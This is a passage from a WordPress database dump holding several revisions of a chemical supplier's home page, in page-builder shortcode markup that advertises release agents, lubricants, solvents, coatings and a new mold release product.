link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:10:35', '2016-09-11 16:10:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1512, 1, '2016-09-11 16:12:22', '2016-09-11 16:12:22', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:12:22', '2016-09-11 16:12:22', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1513, 1, '2016-09-11 16:13:51', '2016-09-11 16:13:51', '[ux_banner_grid height="400px" padding="0px"]\r\n[col span="6"]\r\n[row]\r\n\r\n[col span="2"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n[/col]\r\n\r\n[col span="2"]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:13:51', '2016-09-11 16:13:51', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1514, 1, '2016-09-11 16:14:38', '2016-09-11 16:14:38', '[ux_banner_grid height="400px" padding="0px"]\r\n[col span="6"]\r\n[row]\r\n\r\n[col span="2"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n[/col]\r\n\r\n[col span="2"]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/col]\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:14:38', '2016-09-11 16:14:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1515, 1, '2016-09-11 16:16:25', '2016-09-11 16:16:25', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:16:25', '2016-09-11 16:16:25', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1516, 1, '2016-09-12 11:41:09', '2016-09-12 11:41:09', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" 